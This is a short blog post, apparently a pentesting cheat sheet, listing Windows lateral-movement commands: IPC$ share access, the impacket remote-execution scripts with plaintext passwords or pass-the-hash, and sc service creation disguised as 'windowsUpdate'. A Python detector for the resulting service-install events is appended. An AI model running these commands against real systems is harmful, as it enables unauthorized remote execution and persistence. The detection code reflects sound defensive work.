
Lateral Movement: Command Execution

Date: 2021-08-24 09:57:44

1. Establishing an IPC connection

net use \\ip\ipc$ "password" /user:"username"
dir \\ip\c$\programdata
copy C:\Users\xx.txt \\ip\c$\programdata\config.exe
del \\ip\c$\1.txt
View IPC connections:
net use
Delete the IPC connection:
net use \\ip /del /y

2. atexec.py from the impacket suite

python3 atexec.py AD/administrator:123456@192.168.111.22 'whoami'
python3 atexec.py -hashes :NTLMHASH AD/administrator@192.168.111.22 'whoami'

3. dcomexec.py from the impacket suite

python3 dcomexec.py god/administrator:Liu78963@192.168.10.20
python3 dcomexec.py god/administrator:Liu78963@192.168.10.20 whoami
python3 dcomexec.py administrator:@192.168.52.143 whoami -hashes aad3b435b51404eeaad3b435b51404ee:d8f69f9520b448174136e49a1051ef07

4. psexec.py from the impacket suite

python3 psexec.py god/administrator:Admin12345@192.168.3.21 cmd.exe
python3 psexec.py -hashes :NTLMHASH AD/administrator@192.168.111.22 'whoami'

5. smbexec.py from the impacket suite

python3 smbexec.py AD/administrator:123465@192.168.0.23
python3 smbexec.py -hashes :NTLMHASH AD/administrator@192.168.111.22 'whoami'

6. wmiexec.py from the impacket suite

python3 wmiexec.py administrator:Liufupeng123@192.168.52.138
python3 wmiexec.py -hashes LMHASH:NTHASH domain/username@target_ip    // pass the hash to obtain a shell
python3 wmiexec.py -hashes LMHASH:NTHASH domain/username@target_ip "ipconfig"   // execute a command

7. Creating a service with sc to execute commands

sc \\192.168.0.23 create windowsUpdate binpath= "cmd.exe /c c:\programdata\config.exe"
sc \\192.168.0.23 start windowsUpdate
sc \\192.168.0.23 delete windowsUpdate
sc create "SUpdate5" binpath= "cmd /c start "C:\programdata\config2.exe"" && sc config "SUpdate5" start= auto && net start SUpdate5
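
An added example, not part of the original post: service creation as in the sc commands above is recorded on the target in the System log as event 7045 ("A service was installed in the system"). The Python below flags such events when the ImagePath is a cmd one-liner or points into a staging directory such as C:\ProgramData. It assumes the events were already exported as dictionaries using the 7045 field names; the host names, the ExampleAgent entry and the two regex heuristics are choices made for this example.

```python
import re

# Constructed sample records shaped like Service Control Manager event 7045
# ("A service was installed in the system") after export to dictionaries.
# Host names and the ExampleAgent entry are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "srv01.example.test", "ServiceName": "windowsUpdate",
     "ImagePath": r"cmd.exe /c c:\programdata\config.exe", "StartType": "demand start"},
    {"EventID": 7045, "Computer": "srv01.example.test", "ServiceName": "SUpdate5",
     "ImagePath": r'cmd /c start "C:\programdata\config2.exe"', "StartType": "auto start"},
    {"EventID": 7045, "Computer": "srv02.example.test", "ServiceName": "ExampleAgent",
     "ImagePath": r'"C:\Program Files\Example\agent.exe" --service', "StartType": "auto start"},
    # 7036 (service state change) is not an installation and must be ignored.
    {"EventID": 7036, "Computer": "srv02.example.test", "ServiceName": "ExampleAgent"},
]

# A service binary is normally an executable path, not a shell one-liner.
SHELL_WRAPPER = re.compile(
    r'^\s*"?(?:%comspec%|(?:[a-z]:\\\S*\\)?cmd(?:\.exe)?)"?\s+/[ck]\b', re.I)
# Directories often used to stage files copied over admin shares.
STAGING_DIR = re.compile(
    r"[a-z]:\\(?:programdata|users\\public|windows\\temp)\\", re.I)


def score_service_install(event):
    """Return the reasons a 7045 event looks like remote command execution."""
    if event.get("EventID") != 7045:
        return []
    path = event.get("ImagePath", "")
    reasons = []
    if SHELL_WRAPPER.search(path):
        reasons.append("ImagePath launches a command interpreter")
    if STAGING_DIR.search(path):
        reasons.append("ImagePath references a staging directory")
    return reasons


def suspicious_installs(events):
    """Map ServiceName -> reasons for every flagged service installation."""
    flagged = {}
    for event in events:
        reasons = score_service_install(event)
        if reasons:
            flagged[event["ServiceName"]] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in suspicious_installs(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```
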


Original: https://www.cnblogs.com/sakura521/p/15178143.html
